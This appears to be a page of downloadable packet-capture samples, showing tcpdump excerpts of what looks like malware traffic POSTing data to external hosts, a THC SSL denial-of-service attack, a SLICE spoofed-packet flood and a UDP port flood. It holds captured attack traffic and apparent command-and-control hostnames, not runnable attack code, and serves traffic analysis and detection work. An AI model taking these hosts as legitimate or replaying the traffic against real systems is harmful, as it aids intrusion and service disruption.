2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache


2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

THC SSL Application Layer 7 Resource Denial of Service DoS Attack PCAP file Download

2016-05-10 22:55:21.763780 IP 192.168.1.1.80 > 192.168.1.100.46528: Flags [S.], seq 2840197845, ack 3419153931, win 5792, options [mss 1460,sackOK,TS val 19582549 ecr 48899446,nop,wscale 0], length 0
E..<..@.@……….d.P…I….&…..i……….
.*.U..%v….
2016-05-10 22:55:21.763794 IP 192.168.1.100.46528 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899446 ecr 19582549], length 0
E..4.}@.@……d…….P..&..I………….
..%v.*.U
2016-05-10 22:55:21.763846 IP 192.168.1.100.46528 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899446 ecr 19582549], length 101: HTTP
E….~@.@..+…d…….P..&..I…….A…..
..%v.*.U….`…\….wb.t.8……..L..0l..d.~+..-“9….5…….-.#….. ……………………………….
2016-05-10 22:55:21.763866 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [S], seq 2524174511, win 29200, options [mss 1460,sackOK,TS val 48899446 ecr 0,nop,wscale 7], length 0
E..<..@.@..,…d…….P.s……..r…………
..%v……..
2016-05-10 22:55:21.767307 IP 192.168.1.1.80 > 192.168.1.100.46528: Flags [.], ack 102, win 5792, options [nop,nop,TS val 19582549 ecr 48899446], length 0
E..44.@.@……….d.P…I….&p………..
.*.U..%v
2016-05-10 22:55:21.767853 IP 192.168.1.1.80 > 192.168.1.100.46530: Flags [S.], seq 2843979570, ack 2524174512, win 5792, options [mss 1460,sackOK,TS val 19582549 ecr 48899446,nop,wscale 0], length 0
E..<..@.@……….d.P…..2.s……7……….
.*.U..%v….
2016-05-10 22:55:21.767858 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899447 ecr 19582549], length 0
E..4..@.@..3…d…….P.s…..3………..
..%w.*.U
2016-05-10 22:55:21.767900 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899447 ecr 19582549], length 101: HTTP
E…..@.@……d…….P.s…..3…..A…..
..%w.*.U….`…\……..U..m…c…….kQ………….5…….-.#….. ……………………………….
2016-05-10 22:55:21.767914 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [S], seq 4040777504, win 29200, options [mss 1460,sackOK,TS val 48899447 ecr 0,nop,wscale 7], length 0
E..<zW@.@.<….d…….P.._ ……r…………
..%w……..
2016-05-10 22:55:21.772031 IP 192.168.1.1.80 > 192.168.1.100.46530: Flags [.], ack 102, win 5792, options [nop,nop,TS val 19582549 ecr 48899447], length 0
E..4af@.@.U……..d.P…..3.s……f3…..
.*.U..%w
2016-05-10 22:55:21.772608 IP 192.168.1.1.80 > 192.168.1.100.46532: Flags [S.], seq 2847078466, ack 4040777505, win 5792, options [mss 1460,sackOK,TS val 19582550 ecr 48899447,nop,wscale 0], length 0
E..<..@.@……….d.P…..B.._!……………
.*.V..%w….
2016-05-10 22:55:21.772613 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899449 ecr 19582550], length 0
E..4zX@.@.<….d…….P.._!…C………..
..%y.*.V
2016-05-10 22:55:21.772637 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899449 ecr 19582550], length 101: HTTP
E…zY@.@.<P…d…….P.._!…C…..A…..
..%y.*.V….`…\..Q7..r7+.R….”…>.!. ‘F.%s….C….5…….-.#….. ……………………………….
2016-05-10 22:55:21.772648 IP 192.168.1.100.46534 > 192.168.1.1.80: Flags [S], seq 3662814013, win 29200, options [mss 1460,sackOK,TS val 48899449 ecr 0,nop,wscale 7], length 0
E..<>D@.@.x….d…….P.R.=……r…………

SLICE Denial of Service DoS Spoofed Packets Dangerous PCAP file download

2016-05-23 15:37:46.606305 IP 100.85.36.40.10282 > 192.168.1.107.42143: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..dU$(…k(*…@Gd;j.y……..
2016-05-23 15:37:46.606309 IP 60.29.5.54.17350 > 192.168.1.107.39169: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.z……<..6…kC….F…..)…..Z..
2016-05-23 15:37:46.608855 IP 223.135.36.17.21442 > 192.168.1.107.41581: tcp 20 [bad hdr length 0 – too short, < 20]
E..(%……#..$….kS..mY.{.ro.d…..J..
2016-05-23 15:37:46.608873 IP 199.13.15.19.23832 > 192.168.1.107.35628: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……r……..k]..,R..4.G_7……..
2016-05-23 15:37:46.608881 IP 207.78.195.43.10248 > 192.168.1.107.40425: tcp 20 [bad hdr length 0 – too short, < 20]
E..(h%…….N.+…k(…..j
:.TI….gi..
2016-05-23 15:37:46.608888 IP 111.172.220.27.51203 > 192.168.1.107.43962: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..o……k…….
… ……..
2016-05-23 15:37:46.608896 IP 114.112.36.75.12450 > 192.168.1.107.40753: tcp 20 [bad hdr length 0 – too short, < 20]
E..(#…..?Lrp$K…k0..1@.=.W|.7….3E..
2016-05-23 15:37:46.608904 IP 226.108.222.19.38604 > 192.168.1.107.37776: tcp 20 [bad hdr length 0 – too short, < 20]
E..(…….0.l…..k…..G%j..J…..U…
2016-05-23 15:37:46.608912 IP 40.136.196.26.28979 > 192.168.1.107.42144: tcp 20 [bad hdr length 0 – too short, < 20]
E..(k…….(……kq3…y.l..]6…..{..
2016-05-23 15:37:46.613822 IP 200.249.17.78.39281 > 192.168.1.107.36609: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……u[…N…k.q…r..D……..:..
2016-05-23 15:37:46.615473 IP 162.172.4.32.33234 > 192.168.1.107.36610: tcp 20 [bad hdr length 0 – too short, < 20]
E..(R……f… …k……..w..e….>…
2016-05-23 15:37:46.615486 IP 131.22.48.47.47762 > 192.168.1.107.44041: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.w….j…0/…k… !.
…R…..`…
2016-05-23 15:37:46.615490 IP 67.211.237.76.36637 > 192.168.1.107.34741: tcp 20 [bad hdr length 0 – too short, < 20]
E..(.
….C.C..L…k…..\H(=..|…..!..
2016-05-23 15:37:46.615495 IP 254.199.182.106.8573 > 192.168.1.107.41583: tcp 20 [bad hdr length 0 – too short, < 20]
E..(=……….j…k!}.oTkG%…i….2/..
2016-05-23 15:37:46.615501 IP 101.1.236.40.52640 > 192.168.1.107.43686: tcp 20 [bad hdr length 0 – too short, < 20]
E..(……..e..(…k…..Q…@dl…..T..
2016-05-23 15:37:46.615503 IP 198.197.111.0.9903 > 192.168.1.107.35630: tcp 20 [bad hdr length 0 – too short, < 20]

One of the fastest UDP packing port flooders Denial of Service DoS PCAP file download sample

The traffic arrives quickly:

2016-05-23 13:35:11.566884 IP 192.168.1.100.35147 > 192.168.1.107.19383: UDP, length 300
E..HDX@.@.q-…d…k.KK..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566927 IP 192.168.1.100.45999 > 192.168.1.107.45886: UDP, length 300
E..HDY@.@.q,…d…k…>.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566941 IP 192.168.1.100.34419 > 192.168.1.107.12777: UDP, length 300
E..HDZ@.@.q+…d…k.s1..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566954 IP 192.168.1.100.54167 > 192.168.1.107.1915: UDP, length 300
E..HD[@.@.q*…d…k…{.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566970 IP 192.168.1.100.44547 > 192.168.1.107.12793: UDP, length 300
E..HD\@.@.q)…d…k..1..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566981 IP 192.168.1.100.42297 > 192.168.1.107.48335: UDP, length 300
E..HD]@.@.q(…d…k.9…4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.566993 IP 192.168.1.100.49101 > 192.168.1.107.10386: UDP, length 300
E..HD^@.@.q’…d…k..(..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567404 IP 192.168.1.100.42057 > 192.168.1.107.37373: UDP, length 300
E..HD.@.@.q….d…k.I…4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567417 IP 192.168.1.100.45822 > 192.168.1.107.54421: UDP, length 300
E..HD.@.@.q….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567442 IP 192.168.1.100.33163 > 192.168.1.107.34919: UDP, length 300
E..HD.@.@.q….d…k…g.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567459 IP 192.168.1.100.53960 > 192.168.1.107.13784: UDP, length 300
E..HD.@.@.q….d…k..5..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567475 IP 192.168.1.100.36250 > 192.168.1.107.38537: UDP, length 300
E..HD.@.@.q….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567491 IP 192.168.1.100.36046 > 192.168.1.107.50198: UDP, length 300
E..HD.@.@.p….d…k…..4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2016-05-23 13:35:11.567503 IP 192.168.1.100.59388 > 192.168.1.107.64324: UDP, length 300
E..HD.@.@.p….d…k…D.4.e…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………